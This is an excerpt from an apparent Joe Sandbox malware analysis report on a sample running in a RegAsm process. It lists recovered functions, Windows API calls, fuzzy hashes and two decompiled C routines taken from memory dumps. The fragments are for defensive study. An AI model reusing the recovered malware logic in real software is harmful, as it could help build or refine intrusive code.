OpenProcess.KERNEL32(0010047A,00000000,00000000,?,?,010A3E60,?), ref: 010A25FD
GetLastError.KERNEL32(?,?,010A3E60,?), ref: 010A261C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 106b32f9816d82d1c34f76b06f7c3083a84bd335d1ed0c6b2bb71d5dafc1c379
Instruction ID: 877fc745c4a447d4841f7835192675e4f6d37fe0f30bd14babb8e6f5dedfd6bc
Opcode Fuzzy Hash: 106b32f9816d82d1c34f76b06f7c3083a84bd335d1ed0c6b2bb71d5dafc1c379
Instruction Fuzzy Hash: BEF0F970B85B11DFD7718FA8A809B593BA4A748794F904529F2C6C71C8D77B5420CF25

Uniqueness

Uniqueness Score: -1.00%

Function 03F10E02, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03F17589,?), ref: 03F10E0A
GetVersion.KERNEL32 ref: 03F10E19
GetCurrentProcessId.KERNEL32 ref: 03F10E28
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03F10E45
GetLastError.KERNEL32 ref: 03F10E64

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 5480a1e1ce30853fa8366f6e1fa2a6667ad5b16aaad5f63092eb4f5da4c80b58
Instruction ID: d38ed804805da9c5a1769bda45aa0db780edb7bad7048dfc8f875585b17c4e37
Opcode Fuzzy Hash: 5480a1e1ce30853fa8366f6e1fa2a6667ad5b16aaad5f63092eb4f5da4c80b58
Instruction Fuzzy Hash: 74F03070A4034ADFE730FF76B82A7193B65B724B41F144515F546C52D8DBB49090CF14

Uniqueness

Uniqueness Score: -1.00%

Function 03F11CB5, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 03F11D3F
HeapFree.KERNEL32(00000000,?), ref: 03F11D50
HeapFree.KERNEL32(00000000,?), ref: 03F11D68
CloseHandle.KERNEL32(?), ref: 03F11D82
HeapFree.KERNEL32(00000000,?), ref: 03F11D97

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: fa789cdfdb4e3f29d59847b234aab4cff468dae1410ce76cde6e3a0963948a6d
Instruction ID: d4ec6d4b29123a95614abfeeda58c294afa3aad7a1d73b8cecf7dfb8c10f7bd9
Opcode Fuzzy Hash: fa789cdfdb4e3f29d59847b234aab4cff468dae1410ce76cde6e3a0963948a6d
Instruction Fuzzy Hash: 49311870601626EBC721EFAAEC8481AFB6AFF44B113584514F615D7694C731ECB1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1A7A5, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000), ref: 03F1A7C9

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

wsprintfA.USER32 ref: 03F1A7FA

Part of subcall function 03F12972: GetSystemTimeAsFileTime.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,03F01E60), ref: 03F12988
Part of subcall function 03F12972: wsprintfA.USER32 ref: 03F129B0
Part of subcall function 03F12972: lstrlen.KERNEL32(?), ref: 03F129BF
Part of subcall function 03F12972: wsprintfA.USER32 ref: 03F129FF
Part of subcall function 03F12972: wsprintfA.USER32 ref: 03F12A34
Part of subcall function 03F12972: memcpy.NTDLL(00000000,?,?), ref: 03F12A41
Part of subcall function 03F12972: memcpy.NTDLL(00000008,03F263D8,00000002,00000000,?,?), ref: 03F12A56
Part of subcall function 03F12972: wsprintfA.USER32 ref: 03F12A79

HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 03F1A86F

Part of subcall function 03F24079: RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F2408F
Part of subcall function 03F24079: RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F240AA

HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 03F1A859
HeapFree.KERNEL32(00000000,?), ref: 03F1A865

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID:
API String ID: 3553201432-0
Opcode ID: 314122a7664d2d76fa8260f9a1197a4724d6ff1704e5e3db844eba5d2797a223
Instruction ID: 7d27af5434d3f8f78d7bfab08c1b5bffc638fb4a3a4ca2fa6d5bfd4b67aa11a3
Opcode Fuzzy Hash: 314122a7664d2d76fa8260f9a1197a4724d6ff1704e5e3db844eba5d2797a223
Instruction Fuzzy Hash: 1221177680024EEBCF11EF95ED88C9F7FB9FB58310B00452AF915A6220D7719A61DB61

Uniqueness

Uniqueness Score: -1.00%

Function 03F11507, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 03F0E463: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 03F0E47E
Part of subcall function 03F0E463: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 03F0E4CC
Part of subcall function 03F0E463: GetProcAddress.KERNEL32(00000000,?), ref: 03F0E4E5
Part of subcall function 03F0E463: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 03F0E536

GetLastError.KERNEL32(?,?,00000001), ref: 03F11695
FreeLibrary.KERNEL32(?,?,00000001), ref: 03F116FD

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: ad291d70bfaa6a6b1f5adb4b542fd8e17318b2e90cd88ab2e40ae2fbccd9d0f6
Instruction ID: fe00a696e0a4534235b9a4621fa6181e0fc02e22099dabbc1814e4e7bb5bf759
Opcode Fuzzy Hash: ad291d70bfaa6a6b1f5adb4b542fd8e17318b2e90cd88ab2e40ae2fbccd9d0f6
Instruction Fuzzy Hash: A771F8B5E0020AEFCF10DFE5D9849AEBBB9FF48304B188569E615EB250D731A951CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0F617, Relevance: 6.2, APIs: 4, Instructions: 156threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F18502: lstrlen.KERNEL32(?,7673D3B0,00000000,00000000,03F1F5D7,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000), ref: 03F1850B
Part of subcall function 03F18502: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1852E
Part of subcall function 03F18502: memset.NTDLL ref: 03F1853D

Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,7673D3B0,043AB17C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02759
Part of subcall function 03F02734: StrTrimA.SHLWAPI(00000000,03F2847C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02778
Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02784

GetCurrentThreadId.KERNEL32 ref: 03F0F6AF
GetCurrentThread.KERNEL32 ref: 03F0F6C2
GetModuleHandleA.KERNEL32(00000000,03F263D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 03F0F749
GetShellWindow.USER32 ref: 03F0F750

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
String ID:
API String ID: 1517849391-0
Opcode ID: 9335c20a73f99c708942c8a6085dd94c9b23f1963567fdd7f882abf9ce1dccdc
Instruction ID: 852a6f950e7d60ab84b62bf8e92e76b5bc5c8f0038a876faeec8a722dacaf235
Opcode Fuzzy Hash: 9335c20a73f99c708942c8a6085dd94c9b23f1963567fdd7f882abf9ce1dccdc
Instruction Fuzzy Hash: 2551A276914305EFD730EF6CC884E5AB7E8AF84350F044929FA819B290DB70ED44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 010A45F5, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E010A45F5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x10aa2d4; // 0x235d5a8
					_t5 = _t102 + 0x10ab038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x10a92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x10aa2d4; // 0x235d5a8
												_t28 = _t108 + 0x10ab0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x10aa2d4; // 0x235d5a8
														_t33 = _t78 + 0x10ab078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x010a45fa
0x010a4603
0x010a4604
0x010a4608
0x010a460e
0x010a4614
0x010a461d
0x010a4623
0x010a462d
0x010a462f
0x010a4635
0x010a463a
0x010a4645
0x010a464d
0x010a4650
0x010a4773
0x010a4656
0x010a4656
0x010a4663
0x010a4669
0x010a466f
0x010a4673
0x010a4679
0x010a4686
0x010a468a
0x010a4690
0x010a4693
0x010a4699
0x010a469f
0x010a46a5
0x010a46a8
0x010a46ab
0x010a46b1
0x010a46ba
0x010a46c0
0x010a46c1
0x010a46c4
0x010a46c5
0x010a46c6
0x010a46ce
0x010a46cf
0x010a46d0
0x010a46d2
0x010a46d6
0x010a46da
0x00000000
0x00000000
0x010a46e0
0x010a46e9
0x010a46ef
0x010a46f9
0x010a46fd
0x010a46ff
0x010a470c
0x010a4710
0x010a4718
0x010a471d
0x010a472f
0x010a4731
0x010a4737
0x010a4737
0x010a4740
0x010a4740
0x010a4742
0x010a4748
0x010a4748
0x010a474b
0x010a4751
0x010a4754
0x010a475d
0x00000000
0x00000000
0x00000000
0x010a475d
0x010a46b1
0x010a46ab
0x010a4693
0x010a4763
0x010a4763
0x010a4769
0x010a4769
0x010a476f
0x010a476f
0x010a4778
0x010a477e
0x010a477e
0x010a463a
0x010a4787

APIs

SysAllocString.OLEAUT32(010A92B0), ref: 010A4645
lstrcmpW.KERNEL32(00000000,0076006F), ref: 010A4727
SysFreeString.OLEAUT32(00000000), ref: 010A4740
SysFreeString.OLEAUT32(?), ref: 010A476F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: a9085e401914a3546c4ac5d8e53ef8cafecc88c0eb2b13393391b5afa0914127
Instruction ID: 01e806825f90a739e0af0c12177109b0858272663224f5ff20ce812f2ba38f28
Opcode Fuzzy Hash: a9085e401914a3546c4ac5d8e53ef8cafecc88c0eb2b13393391b5afa0914127
Instruction Fuzzy Hash: B4515C79E0051ADFCB00DFE8C4888AEBBB9FF89704B544594E955EB214D772AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A32E4, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 010A3325
SysFreeString.OLEAUT32(00000000), ref: 010A3408

Part of subcall function 010A45F5: SysAllocString.OLEAUT32(010A92B0), ref: 010A4645

SafeArrayDestroy.OLEAUT32(?), ref: 010A345C
SysFreeString.OLEAUT32(?), ref: 010A346A

Part of subcall function 010A158E: Sleep.KERNEL32(000001F4), ref: 010A15D6

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 90e0f92ebd3b78a0891fdf8a33f87e3d06f6610881d8ac12df7781aa3a6cbd1b
Instruction ID: 9faa620f45423c39150bcc0c6fe264fa8e1b9a5054973752c7df0b16fc9ba1ed
Opcode Fuzzy Hash: 90e0f92ebd3b78a0891fdf8a33f87e3d06f6610881d8ac12df7781aa3a6cbd1b
Instruction Fuzzy Hash: 5E518635A0020AEFDB11DFE8C8848DEBBB6FF88340B558478E695EB210DB35AD45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010A37DC, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E010A37DC(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E010A5E2D(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E010A4189(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E010A1456(_t101,  &_v428, _a8, _t96 - _t81);
					E010A1456(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E010A4189(_t101,  &E010AA188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E010A4189(_a16, _a4);
						E010A64D9(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L010A7F0C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L010A7F06();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E010A3511(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E010A7623(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E010A263A(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E010AA188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x010a37df
0x010a37eb
0x010a37f1
0x010a37f6
0x010a37fa
0x010a396c
0x010a3970
0x010a3970
0x010a3800
0x010a3804
0x010a380a
0x010a380b
0x010a3816
0x010a381c
0x010a3821
0x010a3824
0x010a383e
0x010a384d
0x010a3859
0x010a3863
0x010a3868
0x010a386a
0x010a386d
0x010a3924
0x010a392a
0x010a393b
0x010a394e
0x010a3964
0x00000000
0x010a3969
0x010a3876
0x010a387d
0x010a3881
0x010a3887
0x010a3889
0x010a388b
0x010a388d
0x010a388f
0x010a3899
0x010a389e
0x010a38a0
0x010a38a2
0x010a38a3
0x010a38a4
0x010a38a5
0x010a38ac
0x010a38b3
0x010a38b6
0x010a38b6
0x010a3883
0x010a3883
0x010a3883
0x010a38be
0x010a38c6
0x010a38d2
0x010a38d7
0x010a38d7
0x010a38dc
0x00000000
0x00000000
0x010a38de
0x010a38e1
0x010a38ee
0x00000000
0x00000000
0x010a38f0
0x010a38f0
0x010a38fd
0x010a38d7
0x010a38dc
0x00000000
0x00000000
0x00000000
0x010a38dc
0x010a3907
0x010a390a
0x010a390d
0x010a3914
0x010a3914
0x010a3921
0x00000000
0x010a3921
0x010a380d
0x010a3811
0x010a3812
0x010a3814
0x00000000
0x00000000
0x00000000
0x010a3814
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 010A388F
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 010A38A5
memset.NTDLL ref: 010A394E
memset.NTDLL ref: 010A3964

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 864e5c87119a24a82dbb90d5f8d14aa62d71c6fe1b2d9e5210514f8d6c1a3b04
Instruction ID: 8751dcea128aa1b782f09d561faf03f7c902ac7a2af99e4219bb9eeee3defa0c
Opcode Fuzzy Hash: 864e5c87119a24a82dbb90d5f8d14aa62d71c6fe1b2d9e5210514f8d6c1a3b04
Instruction Fuzzy Hash: 85419471A0021ABBDB119FA8CC40BEE77B5FF55310F504569F9959B280EB70AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F0198F, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03F01A42
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03F01A58
memset.NTDLL ref: 03F01B01
memset.NTDLL ref: 03F01B17

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 522fc51f4ffc7f6ee9ae651ce44f9098007ea44bb76f6f2baf1e5908399e0f89
Instruction ID: 1aff0b83e86a12d002d8aadef23aa79efd5b502414002ed123ec988751544e0d
Opcode Fuzzy Hash: 522fc51f4ffc7f6ee9ae651ce44f9098007ea44bb76f6f2baf1e5908399e0f89
Instruction Fuzzy Hash: 7D41F335A00219AFDB10DF6CDC40BEEB779EF46710F044569F949AB2C0DB709E559B90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1B1E1, Relevance: 6.1, APIs: 4, Instructions: 129stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,03F148DE,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1B1F1
StrChrA.SHLWAPI(00000000,00000020,?,00000000,03F148DE,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1B202

Part of subcall function 03F18502: lstrlen.KERNEL32(?,7673D3B0,00000000,00000000,03F1F5D7,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000), ref: 03F1850B
Part of subcall function 03F18502: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1852E
Part of subcall function 03F18502: memset.NTDLL ref: 03F1853D

ExitProcess.KERNEL32 ref: 03F1B350

Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,7673D3B0,043AB17C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02759
Part of subcall function 03F02734: StrTrimA.SHLWAPI(00000000,03F2847C,00000000,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02778
Part of subcall function 03F02734: StrChrA.SHLWAPI(00000000,03F1BD43,?,03F0E096,03F1BD43,00000020,043AB17C,?,?,03F1BD43), ref: 03F02784

lstrcmp.KERNEL32(00000000,?), ref: 03F1B26E

Part of subcall function 03F1B9D4: FindFirstFileW.KERNEL32(?,?,?,?), ref: 03F1BA60
Part of subcall function 03F1B9D4: lstrlenW.KERNEL32(?), ref: 03F1BA7C
Part of subcall function 03F1B9D4: lstrlenW.KERNEL32(?), ref: 03F1BA94
Part of subcall function 03F1B9D4: lstrcpyW.KERNEL32(00000000,?), ref: 03F1BAAD
Part of subcall function 03F1B9D4: lstrcpyW.KERNEL32(00000002), ref: 03F1BAC2
Part of subcall function 03F1B9D4: FindNextFileW.KERNEL32(?,00000010), ref: 03F1BAEA
Part of subcall function 03F1B9D4: FindClose.KERNEL32(00000002), ref: 03F1BAF8
Part of subcall function 03F1B9D4: FreeLibrary.KERNEL32(?), ref: 03F1BB0A

Part of subcall function 03F0D822: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F0D845
Part of subcall function 03F0D822: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,03F1B2AE,?,?,00000000,03F148DE,00000000,74E5F5B0,03F21D54), ref: 03F0D886

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
String ID:
API String ID: 2123058440-0
Opcode ID: df61218080bef9b99d2fb9bdc3fe509b6ae75474dc91a527c96af2cc0599c7b6
Instruction ID: d17b4da176e9e016107d4fcd0d98d62d0bfa5d69508cfcb236c939dc79ba1020
Opcode Fuzzy Hash: df61218080bef9b99d2fb9bdc3fe509b6ae75474dc91a527c96af2cc0599c7b6
Instruction Fuzzy Hash: 04418A76604306EFD720EF65EC8882FB7E9EB98210F08482DF596C6150EB71DC259B22

Uniqueness

Uniqueness Score: -1.00%

Function 03F0FF23, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03F10043

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetLastError.KERNEL32 ref: 03F0FFB7
WaitForSingleObject.KERNEL32(00000000), ref: 03F0FFC7
GetLastError.KERNEL32 ref: 03F0FFE7

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 946e4519e5b32ab12ba6e1eb9ebf26504209120550db213fe2031401777ce853
Instruction ID: 30ebe32c876506d4b7a4982ae4753f940473ded304d8fa5f0d1aa12c160dc270
Opcode Fuzzy Hash: 946e4519e5b32ab12ba6e1eb9ebf26504209120550db213fe2031401777ce853
Instruction Fuzzy Hash: 6C415F71D0020AEFCF20EF94D8849ADBBB9FF04345F5444AAE401E7264DB319E90EB20

Uniqueness

Uniqueness Score: -1.00%

Function 03F01DC1, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0A736: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03F21190), ref: 03F0A742
Part of subcall function 03F0A736: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03F1D371,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 03F0A7A0
Part of subcall function 03F0A736: lstrcpy.KERNEL32(00000000,00000000), ref: 03F0A7B0

lstrlen.KERNEL32(?,00000000,?,?), ref: 03F01E10
wsprintfA.USER32 ref: 03F01E40
